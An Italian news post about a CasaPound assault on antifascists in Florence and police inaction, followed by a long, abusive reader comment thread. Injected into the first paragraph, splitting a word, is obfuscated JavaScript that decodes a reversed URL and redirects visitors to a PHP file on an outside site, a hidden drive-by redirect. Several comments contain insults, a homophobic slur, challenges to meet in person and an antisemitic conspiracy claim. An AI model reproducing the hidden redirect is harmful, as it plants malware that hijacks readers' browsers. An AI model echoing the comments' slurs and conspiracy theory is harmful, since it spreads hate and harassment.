A Firenze Casa Pound pesta due giovani antifascisti. Nessun arresto e tre domande.

image_pdfimage_print

arriva da Firenze Antifascista, che aggiunge: “Nella piazza erano presenti diversi agenti della Digos che sono intervenuti qu (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando il pestaggio era ormai finito, hanno così identificato e portato in Questura solo gli aggrediti e ‘stranamente’ lasciato andar via gli aggressori. Diciamo questo, non tanto per ricercare un giustizialismo che non ci appartiene, ma per evidenziare per l’ennesima volta le collusioni e la copertura di cui godono i fascisti. Le forze dell’ordine sono sempre attente quando i fascisti sono in difficoltà e in inferiorità, blindano le loro sedi quando scendono in piazza gli antifascisti, sono solerti e “precisi” nelle indagini a carico dei compagni, ma quando la situazione lo richiede allentano le maglie, le indagini portano in un vicolo cieco come per “l’inchiesta Casseri” e addirittura lasciano che si consumino pestaggi davanti ai loro occhi come in questo caso.” Da notare che la Questura, con una nota all’Ansa, ha fatto invece sapere che è stata la proprio la Digos ad allontanare gli aggressori. Se così resta però aperta la contraddizione sul perché i neofascisti non siano stati arrestati anche se colti in flagranza di reato.

Il comunicato di Firenze Antifascista continua ricordando l’eccidio di Piazza Dalmazia, dove nel dicembre 2011 il neofascista di Casa Pound Pistoia Gialuca Casseri uccise i senegalesi Modou Samb e Mor Diop “Ad un mese dal secondo anniversario della strage fascista di piazza Dalmazia effettuata da Casseri, le cui connivenze con la locale Questura sono state ampiamente documentate, la violenza fascista agisce di nuovo in questa città. Questo non è più tollerabile! In una fase di crisi strutturale come quella che stiamo attraversando non è possibile non rendersi conto del perché i fascisti vengano ancora una volta sostenuti e appoggiati dalle istituzioni dello Stato: ciò che accade in Grecia con Alba Dorata dovrebbe insegnarci qualcosa!”

Firenze Antifascista esprime “la massima solidarietà ai compagni aggrediti” e conclude invitando “tutte le realtà del territorio e non solo, tutti coloro che si riconoscono nei valori e nella pratica dell’antifascismo a fare altrettanto e prepararsi alla mobilitazione di cui comunicheremo le modalità nei prossimi giorni.”

perUnaltracittà, la lista di cittadinanza, pone invece alla città tutta tre domande, dopo questa ennesima aggressione di Casa Pound:

1) Come mai la Digos, presente in piazza Repubblica, ha identificato solo i tre antifascisti aggrediti, e non è riuscita a fermare neanche uno degli aggressori?
2) Come può essere tollerato che una organizzazione dichiaratamente fascista apra una sede, a 50 metri dalla Questura, faccia impunemente attività politica inneggiando al ventennio, esponga bandiere di Alba Dorata?
3) Come è possibile che in via San Gallo apra un “club privato” che dietro il nome “Ghibellin fuggiasco” nasconde la sede di un’altra associazione neonazista, la Fenice, che ospita festini con relativi cori razzisti e inneggiamenti a Hitler?

0 Comments

  1. Galliano Nicoletti

    Mi sembra giusto che ogni tanto le prendano gli antifascisti le botte, se rompessero meno tutto questo non succederebbe. Perchè gli antifascisti possono manifestare quando e come vogliono e i cosi detti fascisti non si possono muovere che sono botte, Le stanno impedendo di aprire le sezioni in varie città, invece loro antifascisti black block e centri sociali sono ben difesi dalla sinistra. Forza Casa Pound non fatevi intimorire.

    Reply
  2. Yo

    Galliano Nicoletti, i “cosidetti fascisti” non “si possono muovere che sono botte” perchè sono un fottuto gruppo di persone che inneggia alla violenza e al razzismo.

    La nostra COSTITUZIONE vieta a questi gruppi di far POLITICA perchè sono origine di qualsiasi ostacolo allo sviluppo morale e sociale di questo, e non solo, paese.

    Che se ne vadano a fare i loro ritrovi segreti da parodia del KKK fuori da questo paese. Lontano da qualsiasi segno di civiltà. Perchè è lì che dovrebbero stare, e dove dovresti stare anche te, cosidetto “forza Casa Puond non devi farti intimorire”.

    Vergognatevi.

    Reply
  3. Fabio Fafo

    Davide Pastore citami qualcosa della costituzione che possa confermare la tua tesi, evita le stronzate transitorie che cadresti nel banale. a questo punto studia un po' di legislatura e poi forse, solo allora, potrai tirare in ballo la costituzione…

    Reply
  4. Fabio Fafo

    non conosci la magia antifa, sempre pronti a moltiplicarsi, salvo poi battere il record del mondo nei 100mt piani.

    Reply
  5. Geometra Filippo Rocca

    Antifascisti che camminano casualmente da quelle parti con caschi in mano, si fermano casualmente e pacificamente ad urlare contro il Caffè e contro i fascisti, augurando la morte a diavoli e santi, minacciando e offendendo delle ragazze sedute ad un tavolo, sono finiti a starnazzare e a frignare sui giornali, dal magistrato e dalla De Zordo.

    Qua! Qua! Qua!

    Reply
  6. Valerio Vanni

    Per la cronaca, dato che non siete capaci di espletarla in modo oggettivo, Alba Dorata è un partito LEGALE, quindi, l' esposizione dei suoi simboli non comporta nessun reato!

    Inoltre, CasaPound Firenze stava presentando un libro e alcune militanti hanno subito un' aggressione verbale e fisica da parte delle tre pseudo vittime!

    IMPARATE A FARE CRONACA, NON POLITICA FAZIOSA !!!

    Reply
  7. giordano parente

    fabio fafo se vieni dalle mie parti ti faccio vedere come gli antifa fanno i 100 mt piani coglione del cazzo. valerio vanni e l’altro il geometra filini, parlate di cose che neanche conoscete è stata 1 aggressione dei soliti fasci vigliacchi in 10 contro 2, anzi 3 la terza era 1 donna. MERDE !!!! ((A))

    Reply
  8. Dario Nicolino

    Paolo Samuel Gazzola non spieghi la moltiplicazione però.O forse è come per i maghi che non possono svelare i loro trucchi?

    Reply
  9. Giordano Gio Parente

    sig geometra filini nn parlare di cose che nn sai. nessuno si è avvicinato a quelle merde, è stata 1 aggressione vera e propria dei soliti vigliacchi fasci, in 10 contro 2 e la terza era 1 donna qua qua qua. ((A))

    Reply
  10. simone nicoletti

    eheheheh ma quante botte avete presoi a roma? 😀 e poi sempre dietro ai vostri padrini poliziotti vi mettete vero? hehehe facile parlare con le guardie che vi scortano in ogni dove facile 😉 e prendere soldi da forza italia e fratelii d'italia hehehehheh mi fate morire vvi giuro sto pensando di farmi la tessera a casa pound bhauhauhahuha

    Reply
  11. simone nicoletti

    mammamia se devono aprire sezioni cone il tuo cervello mammamia scappiamo tutti!!!! n so se ti ricordi la parola apologia del fascismo….credo di no….. va be

    Reply
  12. simone nicoletti

    Fabio Fafo bhe gia la legge mameli e' una stronzata che tu parli poi leggiti questo coglione!!!L'apologia del fascismo è un reato previsto dalla legge 20 giugno 1952, n. 645 (contenente "Norme di attuazione della XII disposizione transitoria e finale (comma primo) della Costituzione"), anche detta "legge Scelba", che all'art. 4 sancisce il reato commesso da chiunque "fa propaganda per la costituzione di una associazione, di un movimento o di un gruppo avente le caratteristiche e perseguente le finalità" di riorganizzazione del disciolto partito fascista, oppure da chiunque "pubblicamente esalta esponenti, princìpi, fatti o metodi del fascismo, oppure le sue finalità antidemocratiche".

    La "riorganizzazione del disciolto partito fascista", già oggetto della XII disposizione transitoria della Costituzione, si intende (ai sensi dell'art. 1 della citata legge) riconosciuta "quando una associazione, un movimento o comunque un gruppo di persone non inferiore a cinque persegue finalità antidemocratiche proprie del partito fascista, esaltando, minacciando o usando la violenza quale metodo di lotta politica o propugnando la soppressione delle libertà garantite dalla Costituzione o denigrando la democrazia, le sue istituzioni e i valori della Resistenza, o svolgendo propaganda razzista, ovvero rivolge la sua attività alla esaltazione di esponenti, principi, fatti e metodi propri del predetto partito o compie manifestazioni esteriori di carattere fascista."

    Reply
  13. Gojo Paolo Colasanti

    La foto di repertorio è meravigliosa … la titolerei QUESTI QUAI SONO I MIEI RAGAZZI … oppure LA CONOSCETE LA SITUAZIONE … o anche LEVATI FRANCESCO … boh facciamo un sondaggio?

    Fasci e Sbirri, true love.

    Reply
  14. Gabriele Taddei

    La Rivoluzione per me la può volere chi gli pare. Il citazione che ho scritto esprime un altro concetto. Non è un pranzo di gala. Perciò antifascisti, fascisti o chi altro vu siate, se vi dite rivoluzionari non scassate le palle con lagne per i cazzotti, perché le rivoluzioni son fatte di sangue.

    Reply
  15. Gabriele Dini

    Già il fatto che si parli di fascismo e comunismo rende l'idea della povertà di idee in cui vivono gli appartenenti alle due fazioni. D'altonde in qualche modo si deve occupare il lasso di tempo che intercorre tra la nascita e la morte. Quasi quasi decido di partire per le crociate….

    Reply
  16. Davide Pastore

    Fabio Fafo guarda volevo quasi risponderti prendendoti l articolo della costituzione italiana dove si dice esplicitamente che l'apologia di fascismo è reato in Italia , ma te l'hanno già scritto , per fortuna in italia non sono tutti ignoranti come te .

    Reply
  17. Davide Pastore

    Mah …non è che gli antifascisti siano brava gente , è anch'essa gente legata a un concetto vecchio di 50 anni come i fasci (come te) il problema sorge nel momento in cui essere antifascista sia legale , essere fascista invece no … questo perchè siete delle zecche rinate dalle fogne e li dovreste tornare peace 🙂

    Reply
  18. Geometra Filippo Rocca

    Un anarchico sfigato di cinquant'anni che si fa gli autoscatti, scrive come i quattordicenni, che incita ad uccidere i fascisti ma si indigna di fronte a quattro labbrate tirate a due maleducati antifascisti (e nessuna ragazza è stata sfiorata) " lì per caso " che stavano minacciando con dei caschi alcune giovani ragazze sedute ad un tavolo…
    Cioè almeno smettetela di dire che siete banditi, guerriglieri, rivoluzionari, supereroi se poi andate a piangere sui giornali e chiamate in causa la signora De Zordo, o la sera non fate troppo tardi perchè sennò i ravioli in brodo di mamma si freddano.
    Dai su, che magari condividendo qualche link di quelle pagine da duri ribelli almeno un paio di "mi piace" li prendi, forse un cesso di compagna la rimorchi, ti senti poi un degno discendente di quel nonnino che corse sui monti e scendeva a valle per rapinare la povera gente e la revolutiòn la fai sicuramente anche senza prendere freddo.

    Reply
  19. Matteo Bortolon

    Parti per la Grecia Gabriele, là i fascisti sono in auge, picchiano chi li contrasta e gli immigrati… l'antifascismo è come l'aria; finché c'è la si dà per scontata, quando manca ci si ricorda che è importante. Noi ricordiamo.

    Reply
  20. Geometra Filippo Rocca

    Ma la maschera di vù pe'vendetta fatta in Asia da qualche mega ditta che sfrutta i lavoratori schiavizzati ce l'hai??? Pecchèsennòuntusseiunrivoluzionarioammodino

    Reply
  21. Ildebrando Pizzetti

    sono inorrdito dal tono di certi commenti.
    Ma questa destra si sveglia solo per esaltare la violenza?
    Ma non potreste provare a fare un po' l'amore?
    Magari se non trovate nessuno/a disponibile con un po' di masturbazione passano certe spigolature aggressive.
    Provate.
    Meglio una sega che la saga del duce.

    Reply
  22. Giordano Gio Parente

    Geometra Filippo Rocca ahahahahahah guarda ti posso assicurare che sono tutto meno che sfigato, a differenza tua si capisce benissimo dai tuoi commenti che sei solo un poveraccio frustrato e complessato, dici agli altri quello che sei te, è l'unico modo x sentirti quello che sei: 1 poveraccio che in tutta la sua vita la vagina l'ha vista 1 sola volta, quella di tua madre, quando sei nato !! e poi io nn sono mai andato a piangere da nessuno e sta de zardo chi è ?? SEI SOLO UN POVERO COGLIONE, FRUSTRATO E COMPLESSATO. OLTRETUTTO NN SARESTI NEANCHE IN GRADO DI RIMORCHIARE SONO SICURO CHE FAI TALMENTE SCHIFO CHE SE METTI UNA FOTO FB TI OSCURA. AHAHAHAHAH MA SPARATI BRUTTO COGLIONE

    Reply
  23. Giordano Gio Parente

    Geometra Filippo Rocca coglione del cazzo, io ho messo al mondo anche 2 bimbi, cosa che un poveraccio come te nn farà mai. primo xchè nn troveresti la materia prima, secondo, xchè sicuramente sei pure frocio

    Reply
  24. Giordano Gio Parente

    Geometra Filippo Rocca coglione del cazzo, io ho messo al mondo anche 2 bimbi, cosa che un poveraccio come te nn farà mai. primo xchè nn troveresti la materia prima, secondo, xchè sicuramente sei pure frocio

    Reply
  25. Alessio Tarani

    Paolo Samuel Gazzola Numerosisssisisisismsiissisimi…. Ma se a Trento eravate due gatti… ahahhahah e a un certo punto del corteo dal megafono si sente "come siamo arrivati qua torniamo indietro compatti, ma ritorneremo"….. hahahhahah ridicoli!!!!!!

    Reply
  26. Michelangelo Skull Head Caruso

    Fabio Fafo legge 20 giugno 1952, n. 645 (contenente "Norme di attuazione della XII disposizione transitoria e finale (comma primo) della Costituzione"), anche detta "legge Scelba", che all'art. 4 sancisce il reato commesso da chiunque "fa propaganda per la costituzione di una associazione, di un movimento o di un gruppo avente le caratteristiche e perseguente le finalità" di riorganizzazione del disciolto partito fascista, oppure da chiunque "pubblicamente esalta esponenti, princìpi, fatti o metodi del fascismo, oppure le sue finalità antidemocratiche".

    Senza considerare che l'itera costituzione Italiana praticamente un impianto per evitare il ripetersi di regimi totalitari, come il fascismo.

    Ignorante.

    Reply
  27. Geometra Filippo Rocca

    Ti ho messo un "mi piace" così ti senti più rivoluzionario e ribelle, magari se vuoi ti darò una mano con tutti quei link da bimbi minchia che tieni sul profilo e che nessuno a quanto pare si incula, però fammi un piacere: ripassa, e quando vorrai intraprendere un discorso con qualcuno, assicurati di conoscere quanto meno i personaggi politici interessanti nella vicenda di cui si sta parlando che magari sono pure consiglieri comunali a Firenze 😉

    Ciao ribelle 🙂

    Reply
  28. Giordano Gio Parente

    già dimenticavo, poi chiudo davvero. 50 anni ancora nn li ho, ce l'ho 47, te invece quanti anni hai ? no, xchè oltre alle foto nn vedo la tua data di nascita. mica sarai nato l'anno del coglione ? ciao coglione

    Reply
  29. Geometra Filippo Rocca

    @pastore: mi potresti gentilmente dire dove hai letto che essere fascisti è illegale?
    Ho la costituzione italiana nella mia libreria, quando lo trovi dimmelo. 😉

    Reply
  30. Giorgio Squilloni

    che alba dorata sia un partito legale è discutibile. legale dove? in grecia,forse?! beh da quanto so lo stanno mettendo fuori legge (quanto meno i suoi rappresentanti). E se pure fosse legale in grecia non è detto che lo sia in italia, dove vigono le leggi italiane secondo le quali alba dorata non potrebbe essere legale.

    Reply
  31. Davide Pastore

    Geometra Filippo Rocca La XII disposizione finale della Costituzione italiana[1] vieta la riorganizzazione, sotto qualsiasi forma, del disciolto partito fascista.
    La legge n. 645/1952, in materia di Apologia del fascismo, sanziona chiunque faccia per la costituzione di un'associazione, di un movimento o di un gruppo avente le caratteristiche e perseguente le finalità di riorganizzazione del disciolto partito fascista, e chiunque pubblicamente esalti esponenti, principi, fatti o metodi del fascismo, oppure le sue finalità antidemocratiche. mi sa che la costituzione oltre a tenerla nella libraria dovresti anche leggerla ogni tanto

    Reply
  32. Benanchi Madda

    SIETE RIDICOLI!!!! DONNE INCINTE, CASCHI IN MANO! MA FATEVI RICOVERARE! NESSUNA AVEVA CASCHI I DUE RAGAZZI 20ENNI PESANO 30 KILI VESTITI E IL TERZO è UNA RAGAZZA DI MANCO VENTANNI! FATE RIDERE!

    Reply
  33. Claudio Cagnani

    Il vostro articolo.di stampa.è pari..alla libertà che c'è in italia…siamo al 57° posto per libertà di stampa….per forza…scrivete…una piccola parte di verità ed una grande di sciocchezze…….ed ecco il risultato…buona serata……………..

    Reply
  34. Davide Pastore

    Geometra Filippo Rocca sanziona inoltre chiunque pubblicamente esalti esponenti , principi, fatti o metodi del fascismo oppure le sue finalità antidemocratiche … se leggi solo ciò che ti fa comodo tanto vale che al posto della costituzione italiana in libreria ci metti un topolino .

    Reply
  35. Davide Pastore

    Geometra Filippo Rocca sanziona inoltre chiunque pubblicamente esalti esponenti , principi, fatti o metodi del fascismo oppure le sue finalità antidemocratiche … se leggi solo ciò che ti fa comodo tanto vale che al posto della costituzione italiana in libreria ci metti un topolino .

    Reply
  36. Davide Pastore

    Alessandro Calvo va bene spiegami la dodicesima disposizione finale della costituzione italiana . spiegami anche la legge n. 645/1952, in materia di Apologia del fascismo così vediamo a chi è ignota la costituzione .

    Reply
  37. Gabriele Duranti

    Giordano Gio Parente ma tu vai allo stadio a fare il tifo o cose del genare?ma il problema per te sono i camerati di casa pound?della serie la città è troppo piccola x noi due?perchè nonm cercate di impegnare il tempo in cose costruttive anziché dare la caccia al fascio?hai letto qualcosa degli anni di piombo?se qualcosa andasse storto uno così in vista scampa cinque minuti.io preferisco lottare per promuovere non per fare a cazzotti ammantandomi di democrazia e verità unica.sii tollerante con le minoranze anche nei fatti.ma veramente hai mai più sentito slogan contro di voi negli ultimi dieci anni?lo so è questione di quel che ti ha raccontato il nonno.ti assicuro son passati più di 40 anni vedete di guardare avanti con coraggio le sfide son ben più toste del prendere due labbrate da un concittadino provocato contro cui sfogare la rabbia della tua vita!!

    Reply
  38. Gabriele Duranti

    Davide Pastore la costituzione dice che
    bisogna pensarla tutti come te?sii bravo davide ci sono le moschèe i trans i bambini drogati e quant altro.il lavoro?che dice la costituzione a riguardo?quando nella amata sarà scritto altrttanto suòl comunismo si cambierà nome tutti ma non idee mi sa!per te che dici.

    Reply
  39. Gabriele Duranti

    Giorgio Squilloni dici cazzate..dici che un partito proiettato al quindici per cento se riescono a spaventare il popolo,sennò ben di più verrebbe liquidato con il carcere?in quanto anti euro,intesa moneta,e?perche ci sono gli antifà ,cento,che tiran sassi?

    Reply
  40. Valerio Vanni

    @Squilloni- Attieniti ai fatti, invece di sparare boiate! Col vostro sistema pseudo democratico, avete rovinato l' ITALIA e gli ITALIANI! La situazione greca è stata causata dalla politica massonica europea e mondiale, non da Alba Dorata che, ripeto, È UN PARTITO LEGALE! Chi viene aggredito, ha il sacrosanto diritto di difendersi; questo vale per tutti, anche per CasaPound ( si scrive così, EBETI IGNORANTI! ) PUNTO

    Reply
  41. Matteo Bortolon

    Valerio Vanni I seguaci di Alba Dorata aggrediscono immigrati sulla base di deliri razzisti. Adesso CasaPound legittima il nazismo forse? Perché queli sono proprio nazisti… proprio non avete nessun pudore a legittimare la violenza e il marciume?

    Reply
  42. Valerio Vanni

    Bortolon, Alba Dorato è già un partito legittimo, è la terza volta che lo ripeto! Dove hai letto queste puttanate? Su "Il Manifesto" o su "La Repubblica"? Quelli come te se ne sbattono dei problemi presenti in un paese, insistono a propagandare il credo ignorante che è stato inculcato loro nel "cervello"! La Grecia sta subendo le peggiori angherie dal sistema plutocratico europeo e internazionale, ma tu cosa citi in causa? Le fantomatiche aggressioni agli extracomunitari! Torna a blaterare in qualche sede del PD ed evita di rompere i suddetti con questi commenti ridicoli!

    Reply
  43. Matteo Bortolon

    Ascolta Vanni me lo hanno detto degli attivisti Greci che sono stati anche minacciati da quella specie di teppa. Ci sono un sacco di notizie al riguardo. Che poi la Grecia abbia anche ALTRI problemi è vero ma impara la logica se riesci: a prescindere dal fatto che sia un problema grosso o no, il FATTO squalifica il partito neonazista alba Dorata. Sui problemi che ha la Grecia prova a leggere qualcosa di serio fra un inchino al duce e l'altro. http://www.researchonmoneyandfinance.org/

    Reply
  44. Valerio Vanni

    Oh! Pensi di venire a convincermi con le tue ideologie da due soldi ??! Alba Dorata è contro il liberalismo finanziario e le banche, mi basta questo! Poi, stai insistendo a commentare, scrivendo cose non inerenti alla notizia. Alba Dorata è l' unico partito che possa liberare la Grecia dall' usurocrazia giudaico/massonica! Decerebrati, vai a dirlo ai tuoi simili, fesso!

    Reply
  45. Davide Pastore

    Gabriele io non sto dicendo che tutti la devono pensare come me …anzi vi sto solo dicendo che nella costituzione italiana vi è espressamente detto tutto ciò che ho già descritto al riguardo del fascismo . Premettendo il fatto che a me i comunisti stanno sul cazzo tanto quanto i fascisti .. i comunisti in Italia non hanno fatto niente perchè non c'è stato nessun regime comunista in Italia , uno fascista invece si , forse è per questo che i padri fondatori della costituzione ce l'avevano tanto coi fasci …mah adesso arrivano anche i fasci per il diritto di pensiero ahahah fascisti cammufati da democratici O.o

    Reply
  46. Davide Pastore

    Valerio Vanni no scusa lui ha detto ci sono ancora decerebrati che credono nel nazismo ….te gli hai risposto decerebrati vai a dirlo ai tuoi simili , ti sei sentito dunque preso in causa , forse perché credi anche tu nel nazismo ? ma ti sembra una cosa normale ? si inneggiamo tutti ad Adolf Hitler che era tanto buono e tanto di bene ha fatto per il mondo intero …ah gia ma non importa basta essere contro il potere massonico per ottenere la tua approvazione ..una volta che lo si è ti si può ammazzare anche la famiglia no? tanto sono contro il potere massonico O.o

    Reply
  47. Valerio Vanni

    Davide pastore, se io trovo positivo l' operato di Alba Dorata, è ovvio che mi senta chiamato in causa da Borbotton! State insistendo col commentare un articolo di due giorni fa. Vi rendete conto di come siete messi ?? Provocate e offendete, nascosti dietro ad un monitor, emulate nel migliore dei modi le gesta dei vostri antenati. Pastore, dammi retta, vai a rompere i coglioni altrove, è meglio.

    Reply
  48. Davide Pastore

    Valerio Vanni gli appartenenti ad Alba Dorata sono stati accusati di 10 omicidi , ricatti , lavaggio di denaro sporco , nel rapporto redatto dalla polizia greca vi è scritto che Alba Dorata agiva come un organizzazione criminale , organizzata in modo gerarchico con Michaloliakos “Fuehrer” al suo vertice , lo stesso che è stato arrestato per omicidio … beh un ottimo operato direi ..non è ovvio che ti senti chiamato in causa se uno dice " ci sono ancora decerebrati che credono nel nazismo " se ti senti chiamato in causa vuol dire che ci credi anche te ( come quelli di Alba Dorata tra l'altro ) e non è una cosa normale …io non ho offeso ne provocato nessuno …anche te sei dietro un monitor , mio bisnonno era ebreo cattolico e mio nonno partigiano … se tuo nonno era un gerarca fascista non è colpa mia 🙂

    Reply
  49. Valerio Vanni

    O bravo leone da pc, vantati di queste belle parentele. Da chi sono stati accusati? Dal sistema bancario che li considera scomodi. Te lo ridico: hai rotto le palle!

    Reply
  50. Davide Pastore

    Valerio Vanni no veramente sono stati accusati e condannati per 10 omicidi perchè gli hanno commessi (ci sono indagini con tanto di prove reali) se non ci credi guarda un po in giro per il web o mi verrai a dire che tutto internet è controllato dalle banche tranne i siti che guardi te?.io non mi sto vantando di niente , anche se ne vado comunque fiero , meglio un nonno partigiano che fascista come era probabilmente il tuo , in ogni caso qua il leone da pc lo stai facendo solo te …e sinceramente sei te che hai rotto le palle … non sei proprio un ottimo conversatore , ma dopo tutto da un fascio che lo si aspetta che non riesca a discutere .

    Reply
  51. Valerio Vanni

    Dopo due giorni dalla pubblicazione di questo obrobrio di articolo, siete usciti tutti dalle fogne? Ti ricordo, che stai rispondendo, già da un paio d' ore, ad un mio commento; ciò procura continue notifiche con annesse rotture di palle! Hai capito, coglionazzo? Comunque, se vuoi, ne parliamo di persona.

    Reply
  52. Matteo Bortolon

    Valerio Vanni La tua incapacità di argomentare è evidente. Sei stato tu a insistere che Alba Dorata è un partito legale. Nel PRIMO commento peraltro. Io ti dico che è neonazista hai visto il link? Allora sei d'accordo con loro, ergo debbo arguire che approvi anche le camere a gas, lo sterminio di civili inocenti e simili? Come la mettiamo? Quanto alla ideologia, ti ho postato un sito di ottime analisi economico-finanziarie… già ma tu lo sai abbastanza bene l'inglese, vero? Davide Pastore dai non essere troppo cattivo, dobbiamo avere pietà e compassione chi ha evidenti problemi di articolazione logica e di autostima. Chi non li ha non ha alcun motivo di essere aggressivo.

    Reply
  53. Valerio Vanni

    Per quanto riguarda i pedofili, gli stupratori etc.italiani, avete controllato le loro preferenze politiche? Nel PD, chi commette un reato no subisce un giudizio politico, perché ??

    Reply
  54. Matteo Bortolon

    Valerio Vanni La questione che poni è puerile, ovviamente nessuno ha mai fatto un sondaggio del genere. Nel PD è un po' come nel PdL, votano sempre per bloccare la magistratura. Io penso che chi ha commesso determinati reati dovrebbe essere espulso dalla vita politica, punto e basta.

    Reply
  55. Matteo Bortolon

    OVVIAMENTE ciò non c'entra niente con il tema in oggetto che TU hai posto dicendo che Alba dorata è un partito coi fiocchi perché è antiliberista e contro le banche. Beh non è il solo, anche io sono fondamentalmente antiliberista ma non perché sia a favore della razza ariana o di simili stupidaggini già insostenibili negli anni '40 scientificamente figuriamoci oggi. Alba Dorata adora hitler e la sua politica, il responsabile di MILIONI di morti… ogni persona decente anche di destra si sente oltraggiata ad essere accostata a figure del genere. Tu no?

    Reply
  56. Valerio Vanni

    Giordano Gio Parente Hai utilizzato il termine "frocio" in senso dispregiativo, sei pure omofobo e pretendi di insegnare agli altri il concetto di libertà ??!! Poi, non mi risulta che CasaPound Firenze, nella sua storia, abbia aggredito qualcuno; non trovi strano che possa farlo proprio nel giorno in cui ha dichiarato di essere presente alle Giubbe Rosse ??! Povero mentecatto!

    Reply
  57. Valerio Vanni

    Matteo Bortolon , Sei di Firenze, se vuoi ne parliamo, così, vediamo se sei bravo come sul web, demente! Alba Dorata è un partito legale, voluto dal 15% del popolo greco, quindi se non ti piace, vai a contestare la sua legittimità in Grecia. Tutto quello che mette in mostra la vostra incoerenza è puerile? Sì, sono incapace di argomentare, ma solo se seguo le vostre stronzate! Due atomiche sul Giappone, quella è la vostra democrazia, merde!

    Reply
  58. Davide Pastore

    Elisa Bonarrighi in Italia molte robe …cosa hanno i comunisti e simili invece oltre alla costituzione italiana e a formare una repubblica democratica? no perche se mi dici qualcosa che abbiano fatto i comunisti in italia , tipo non so leggi razziali ,guerre in Africa, omicidi ideologici ti d' ho anche ragione ..

    Reply
  59. Dario Nicolino

    Davide Pastore hanno bruciato vivi due bambini a Primavalle,insultato e nascosto gli esuli delle foibe, massacrato gente inerme a guerra finita,aperto la testa a ragazzi di 18 anni che non la pensavano come loro, stuprato bambini al Forteto fino a pochi mesi fa,e parecchie altre. Quale scegli?

    Reply
  60. Mario Paolillo

    è vero che nella costituzione è vietato tutto ciò che sia dichiaratamente di stampo fascista, o riconducibile a tale movimento, ma non dimentichiamoci che la nostra costituzione è stata scritta da chi ha collaborato alla caduta del regime, E' più che normale che abbiano messo articoli per proteggersi in futuro, ma ciò non implica nè che le idee siano del tutto sbagliate, nè tantomeno del tutto giusto

    Reply
  61. Davide Pastore

    @Dario Nicolino vogliamo fare il conto di quanti bambini uccisi o stuprati di quanta gente uccisa per differenza di opinione di quanti massacri e ingiustizie hanno compiuto i fascisti durante il solo ventennio? si certo si possono contare anche episodi in cui i tuoi odiati comunisti (ripeto a me fan schifo pure loro) hanno fatto e commesso atrocità in italia , ma di certo non siamo mai stati sotto un regime comunista e le atrocità commesse dai fascisti in Italia non sono neanche paragonabili anche solo per quantità a quelle commesse da militanti di estrema sinistra presi a caso per compiacere la tua tesi . Ma poi proprio te che hai come immagine di profilo il simbolo di Alba dorata parli ? un Organizzazione di pensiero nazista ? vogliamo vedere quante atrocità hanno fatto anche i nazisti ? quante cazzate ha fatto anche solo Alba Dorata in Grecia ? ma tu pensi davvero di avere ragione ? pensi davvero che questi qua sian santi ?

    Reply
  62. Dario Nicolino

    Davide Pastore non credo a bambinate come il bene o il male assoluto.Perciò no,non penso che i ragazzi di Alba Dorata siano santi. Però non credo neanche a tutto quello che i media dicono di loro,nè che sia di pensiero nazista: che tu ci creda o meno,i fascisti possono pensare in modo indipendente come tutti gli altri e se il fondatore ha espresso simpatie naziste non è detto che tutti i militanti la pensino così. Altrimenti io sarei legittimato a pensare che chiunque vada in giro con la bandiera della falce e il martello voglia riaprire i Gulag,non credi?
    Altra questione: le atrocità che hanno commesso i comunisti tra il 1943 e il 1946 superano ampiamente tutte i crimini (veri e presunti) che hanno fatto i fascisti in vent'anni.Per non parlare delle porcate che hanno fatto nel Biennio Rosso,quel simpaticissimo evento che nei libri di storia è appena appena un paragrafo di frasi vaghe su "agitazioni operaie" per poi descrivere per filo e per segno lo squadrismo:anche lì quello che hanno fatto i compagni sarebbe sufficiente a non farli votare più da nessuno e a far ritenere il comunismo italiano un'idea malata,eppure sono ancora qui….

    Reply
  63. Matteo Bortolon

    Valerio Vanni La tua scortesia mi pare evidente, oltre al fatto che continui a non argomentare. A me pare che se c'è un demente sia quello che non riesce a tirar fuori un argomento nemmeno a penare, o mi sbaglio? Ma cosa c'entra il giappone, sono contro l'imperialismo USA e considero le due atomiche un crimine contro l'umanità, non si discute su questo ma il punto è che tu stai cambiando argomento, AlbaDorata è un partito che inneggia apertamente ai neonazisti, non hai prodotto alcun tipo di risposta al riguardo e continui a cambiare argomento. Fra l'altro se tanto ti sta sulle scatole la politica USA, devi sapere che diversi nazisti passarono al servizio della CIa e dell'esercito USa, per esemio von Braun, sai chi è senza consultare wiki? Ma certo che no 😉 Forse è meglio se vai a studiare… Credimi essere ignoranti è brutto, triste, la tua vita migliorerebbe. Un consiglio completamente disinteressanto quanto veridico.

    Reply
  64. Matteo Bortolon

    Ah dimenticavo sulla "amicizia" dovrò declinare… immagino che mi troverei la bacheca piena di messaggi di odio antiebraico, di inni al duce e ai camerati… no grazie il corso sulle patologie mentali era pieno, non ho bisogno di materiale. Stammi bene.

    Reply
  65. Maurizio

    Mai stato estremista politicamente.. che è la vergogna umana del vivere. se proprio dovessi scegliere fra i 2 scelgo la destra. Solo perchè il comunismo uno schifo assoluto: un miraggio tranello per i più deboli, non c’è niente al mondo di più vigliacco. Su tutto il resto si puó dibattere.

    Reply
  66. Cino Francesco Vezzoso

    il fascismo è reato,stiamo parlando di gente che picchia persone solo perchè "si vestono da comunisti"(parole vostre)…sprangate va andate in galera

    Reply
  67. Cino Francesco Vezzoso

    Dario Nicolino hai vinto il premio nobel x il quoziente intellettivo esageratamente alto? ma parlate di cose serie dai invece di vedere se quelli erano 2 o 3,che poi la colpa è dei giornalisti(merde,la maggiorparte)che cambiano lo stato delle cose interpretando le notizie…champagne molotov

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *